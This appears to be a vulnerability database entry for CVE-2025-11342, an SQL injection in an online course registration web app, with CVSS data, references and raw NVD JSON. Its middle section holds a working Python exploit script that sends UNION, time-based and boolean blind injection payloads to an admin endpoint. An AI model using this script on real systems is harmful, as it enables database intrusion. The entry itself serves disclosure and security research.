CVE-2025-11342

Description

A weakness has been identified in code-projects Online Course Registration 1.0. This impacts an unknown function of the file /admin/edit-course.php. Executing manipulation of the argument coursecode can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:online_course_registration_site:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Course Registration 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11342 - Online Course Registration SQL Injection PoC
# Target: /admin/edit-course.php
# Vulnerable Parameter: coursecode

import requests

# Target configuration
TARGET_URL = "http://target-host.com"
ADMIN_LOGIN_URL = f"{TARGET_URL}/admin/login.php"
EDIT_COURSE_URL = f"{TARGET_URL}/admin/edit-course.php"

# Admin credentials (attacker must have valid admin access)
USERNAME = "admin"
PASSWORD = "password123"

# Create a session to maintain cookies
session = requests.Session()

# Step 1: Login as admin to obtain authenticated session
login_data = {
    "username": USERNAME,
    "password": PASSWORD,
    "submit": "Login"
}
response = session.post(ADMIN_LOGIN_URL, data=login_data)
print(f"[*] Login response status: {response.status_code}")

# Step 2: Craft SQL injection payload for coursecode parameter
# Example: Extract database version via UNION-based injection
sql_payload = "' UNION SELECT 1,version(),3,4,5-- -"

# Step 3: Send malicious request to the vulnerable endpoint
params = {
    "coursecode": sql_payload
}

response = session.get(EDIT_COURSE_URL, params=params)
print(f"[*] Exploit response status: {response.status_code}")
print(f"[*] Response body:\n{response.text}")

# Alternative: Time-based blind SQL injection payload
time_based_payload = "' OR SLEEP(5)-- -"
params_blind = {"coursecode": time_based_payload}
response = session.get(EDIT_COURSE_URL, params=params_blind)
print(f"[*] Time-based injection response time: {response.elapsed.total_seconds()}s")

# Alternative: Boolean-based blind SQL injection payload
boolean_payload = "' AND 1=1-- -"
params_bool = {"coursecode": boolean_payload}
response_true = session.get(EDIT_COURSE_URL, params=params_bool)

boolean_payload_false = "' AND 1=2-- -"
params_bool_false = {"coursecode": boolean_payload_false}
response_false = session.get(EDIT_COURSE_URL, params=params_bool_false)

print(f"[*] Boolean-based TRUE response length: {len(response_true.text)}")
print(f"[*] Boolean-based FALSE response length: {len(response_false.text)}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11342
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11342
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11342/
[4] VulDB https://vuldb.com/cve/CVE-2025-11342
[5] https://code-projects.org/
[6] https://github.com/ttttbm123/cve/issues/1
[7] https://vuldb.com/?ctiid.327227
[8] https://vuldb.com/?id.327227
[9] https://vuldb.com/?submit.664823

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11342", "sourceIdentifier": "[email protected]", "published": "2025-10-06T18:15:50.697", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Online Course Registration 1.0. This impacts an unknown function of the file /admin/edit-course.php. Executing manipulation of the argument coursecode can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_course_registration_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "2B4BF34E-63E6-4ED5-BF47-71CD12BFB06C"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ttttbm123/cve/issues/1", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327227", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327227", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.664823", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}